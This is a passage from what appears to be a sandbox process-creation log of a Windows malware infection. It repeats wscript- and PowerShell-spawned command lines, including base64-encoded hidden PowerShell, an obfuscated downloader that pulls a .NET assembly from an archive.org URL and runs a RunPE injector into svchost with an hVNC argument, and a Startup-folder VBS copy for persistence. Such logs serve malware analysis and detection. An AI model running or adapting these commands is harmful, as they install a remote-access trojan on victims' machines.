nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\pow\wm.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezb9dxjsid0gezf9ahr0chmnkyc6ly9pytywjysnmdewmc51cy5hcmnoascrj3zllm9yzycrjy8ync9pjysndgvtcycrjy9kjysnzxqnkydhjysnac1ub3rllxyvrgv0ywgnkydob3rlvicrjy50ehr7mx07ezankyd9ymfzzty0q28nkydudgvudcankyc9jysniccrjyhozxctt2inkydqzwn0ifn5jysnc3qnkydlbs5ozscrj3quvycrj2viq2xpzscrj250ks4nkydeb3dubccrj29hzfn0jysncmlujysnzyh7mccrj30nkyd1cmwpo3snkycwfwjpbicrj2fyjysneunvbicrj3rlbicrj3qgpscrjyankydbu3lzdgvtlknvbnzlcnrdjysnojonkydgcm9tqmenkydzzty0u3ryaw5nkhswfwjhc2unkyc2nenvbicrj3rlbnqpo3swfwfzc2unkydtymwnkyd5iccrjz0nkycgw1jlzmxly3rpb24uqxmnkydzjysnzw1ibhldojonkydmbycrj2fkkhswfwjpbmenkydyeunvbnrlbnqpo3swfxr5cccrj2ugjysnpsb7jysnmh0nkydhc3nlbscrj2jses5hzxrujysnexankydlkhsxfvinkyd1blbfjysnlkhvjysnbwv7jysnmx0po3swjysnfscrj21ljysndghvzca9ihswfxr5cguur2v0twv0ag9kkhsxfvzbjysnsxsxfscrjyk7ezb9jysnbscrj2unkyd0accrj29klklujysndicrj29rzsh7mh1udscrj2xslcbbb2jqzscrj2n0wycrj11djysnqch7mx0nkycwjysnl2dkmwsnkydtjysnl2qvjysnzwuuzscrj3rzyxavlzpzchr0ahsxjysnfscrjyasjysnihsxfwrljysnc2f0jysnaxzhzg97mscrj30nkycglcb7mscrj31kzxnhdgl2yscrj2qnkydvezf9icwgezf9jysnzgunkydzyxrpdmfkb3snkycxfsx7mx1djysnyscrj3nqbycrj2x7mx0nkycsezenkyd9eycrjzf9ksknks1micbby2hbul0znixby2hbul0zoskgfellea==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgntnjydxjsjysnid0nkycgwicrj0hvjysnahqnkyd0chm6ly8nkydpytywmccrjzewjysnmc51cy5hcmnojysnaxynkydllicrj29yzy8ync8nkydpdccrj2vtcy9kzxrhjysnac1ujysnb3rllxyvrccrj2unkyd0ywhob3rlvicrjy50eccrj3rasg87tnjyjysnymenkydzzty0q29udgvujysndca9ichozxctt2jqzwn0ifn5c3rlbs4nkydozxquv2viqycrj2xpzscrj250ks5eb3dubg9hzccrj1n0cmluzyhoclh1cmwnkycpo05yjysnwccrj2jpjysnbicrj2fyjysneunvbnrlbicrj3qgpscrjybbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzscrjzy0uycrj3ryjysnaw4nkydnke5ywgjhcycrj2u2nemnkydvbicrj3rlbicrj3qpo05ywgfzc2vtymx5id0gjysnw1jlzmxlyycrj3rpb24ujysnqscrj3nzzw1ibhldoicrjzpmjysnb2fkkccrj05yjysnwgjpbmfyjysneumnkydvbnqnkydlbnqpjysnoycrj05ywccrj3r5cccrj2unkycgpscrjyboclhhc3nlbwjsjysnes5hzxruexblkfpibycrj1j1blbflkhvbwvasg8po05ywccrj20nkydldghvzca9iccrj04nkydywhqnkyd5cguurycrj2v0tscrj2v0ag9kjysnkfpijysnb1zbsvpibyk7ticrj3inkydybwv0accrj29klicrj0lujysndm9rzshocicrj1hujysndscrj2xslcbbb2jqzwn0w11dqchasg8wl0u3tycrjzi4l2qvzwuujysnzxrzyxavlzpzchr0afpijysnbyasjysniccrj1pibzfasg8nkycglcbasg9dok93r1bybycrj2dyyw1eyscrj3rhjysntycrj3dhwkgnkydvicwgwkhvahzuy1onkydibywnkydajysnsg9zdicrj2nob3n0wkhvlfpib1pibyknkycpjykglwnyzxbmywnlicaow2noqvjdotarw2noqvjdnzirw2noqvjdmtexksxby2hbul0zos1yzvbsqunlj093rycsw2noqvjdotitcmvqbefdzsaow2noqvjdnzgrw2noqvjdmte0k1tjaefsxtg4ksxby2hbul0znil8aw52t0tllwv4ufjlu1npt04=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace ([char]90+[char]72+[char]111),[char]39-replace'owg',[char]92-replace ([char]78+[char]114+[char]88),[char]36)|invoke-expression" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nrxurl'+' ='+' z'+'ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/d'+'e'+'tahnotev'+'.tx'+'tzho;nrx'+'ba'+'se64conten'+'t = (new-object system.'+'net.webc'+'lie'+'nt).download'+'string(nrxurl'+');nr'+'x'+'bi'+'n'+'ar'+'yconten'+'t ='+' [system.convert]::frombase'+'64s'+'tr'+'in'+'g(nrxbas'+'e64c'+'on'+'ten'+'t);nrxassembly = '+'[reflec'+'tion.'+'a'+'ssembly]:'+':l'+'oad('+'nr'+'xbinar'+'yc'+'ont'+'ent)'+';'+'nrx'+'typ'+'e'+' ='+' nrxassembl'+'y.gettype(zho'+'runpe.homezho);nrx'+'m'+'ethod = '+'n'+'rxt'+'ype.g'+'etm'+'ethod'+'(zh'+'ovaizho);n'+'r'+'xmeth'+'od.'+'in'+'voke(nr'+'xn'+'u'+'ll, [object[]]@(zho0/e7o'+'28/d/ee.'+'etsap//:sptthzh'+'o ,'+' '+'zho1zho'+' , zhoc:owgpro'+'gramda'+'ta'+'o'+'wgzh'+'o , zhohvncz'+'ho,'+'z'+'hosv'+'chostzho,zhozho)'+')') -creplace 